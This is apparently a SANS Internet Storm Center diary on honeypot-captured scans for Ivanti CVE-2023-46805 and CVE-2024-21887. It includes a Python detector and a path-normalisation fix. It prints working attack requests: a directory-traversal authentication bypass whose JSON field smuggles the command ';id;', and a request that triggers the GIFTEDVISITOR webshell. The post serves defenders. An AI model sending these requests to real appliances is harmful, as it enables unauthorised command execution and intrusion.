Ivanti products have given us a rich corpus of vulnerabilities in recent months (years). Of course, we do see occasional scans attempting to exploit them. Just today, I spotted two of them. Neither of them is particularly new, but they are a reminder to keep patching (or disabling):
CVE-2023-46805 and CVE-2024-21887 “tests”
POST /api/v1/totp/user-backup-code/../../system/maintenance/archiving/cloud-server-test-connection HTTP/1.1
Host: [honeypot IP address]:9001
User-Agent: python-requests/2.32.3
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 16
Content-Type: application/json
{"type": ";id;"}
This is a very typical authentication or access control bypass taking advantage of a directory traversal vulnerability. The first part of the URL, “/api/v1/totp/user-backup-code/” is accessible by anybody as it may be used as part of the authentication process. This URL “masks” the latter half that points to confidential information. Always normalize your paths before applying access control rules.
The purpose of this request is to detect whether your system is vulnerable. It will not cause any “damage” beyond leaking information if you are vulnerable. The more severe issue, however, is that an actual exploit attempt will likely follow it.
POST /api/v1/cav/client/visits HTTP/1.1
Host: [honeypot IP address]:5986
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
Connection: close
Content-Length: 13
Accept: */*
Accept-Language: en
Content-Type: text/xml
Accept-Encoding: gzip
GIFTEDVISITOR
Another exploit taking advantage of the two vulnerabilities mentioned above. This request attempts to trigger a webshell that Volexity calls “GIFTEDVISITOR” based on the string used to trigger it. Volexity wrote about this back in January [1]. It’s sad that attackers still think it is worthwhile scanning for this.
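As an added illustration of the two points above (not code from the diary or from Ivanti), here is the vulnerable "check the raw path against a public prefix" pattern next to a version that canonicalizes the path first, plus a small detector that flags the two request shapes shown above. The allowlist, function names and the detection rule are hypothetical; the request paths and body strings are the ones from the captured requests.

```python
import posixpath
from urllib.parse import unquote

# Hypothetical allowlist of paths reachable without authentication, modelled on
# the "/api/v1/totp/user-backup-code/" prefix the scan abuses.
UNAUTH_PREFIXES = ("/api/v1/totp/user-backup-code/",)

# Request path from the first captured scan (traversal after the public prefix).
SCAN_PATH = ("/api/v1/totp/user-backup-code/../../system/maintenance/"
             "archiving/cloud-server-test-connection")


def allowed_unauth_naive(path: str) -> bool:
    """Vulnerable pattern: the rule is applied to the raw request path, so a
    '..' segment after the public prefix still passes the check."""
    return path.startswith(UNAUTH_PREFIXES)


def canonical(path: str) -> str:
    """Percent-decode (twice, to catch double encoding) and collapse '.' and
    '..' segments, keeping a trailing slash so prefix rules still match."""
    decoded = unquote(unquote(path))
    norm = posixpath.normpath(decoded)
    if decoded.endswith("/") and not norm.endswith("/"):
        norm += "/"
    return norm


def allowed_unauth_fixed(path: str) -> bool:
    """Hardened pattern: canonicalize first, then apply the allowlist, and
    refuse anything that still escapes the prefix."""
    norm = canonical(path)
    if ".." in norm.split("/"):
        return False
    return norm.startswith(UNAUTH_PREFIXES)


def flag_request(path: str, body: str) -> list:
    """Detection over one request line and body: returns reasons to alert."""
    reasons = []
    if ".." in unquote(unquote(path)).split("/"):
        reasons.append("traversal segment in path")
    if "GIFTEDVISITOR" in body:
        reasons.append("GIFTEDVISITOR webshell trigger")
    return reasons


if __name__ == "__main__":
    print(allowed_unauth_naive(SCAN_PATH), allowed_unauth_fixed(SCAN_PATH))
    print(flag_request(SCAN_PATH, '{"type": ";id;"}'))
    print(flag_request("/api/v1/cav/client/visits", "GIFTEDVISITOR"))
```

Run it against your own access logs by feeding each request line and body into `flag_request`; a hit on either reason is worth an alert regardless of whether the appliance is already patched.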
[1] https://www.volexity.com/blog/2024/01/10/active-exploitation-of-two-zero-day-vulnerabilities-in-ivanti-connect-secure-vpn/
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.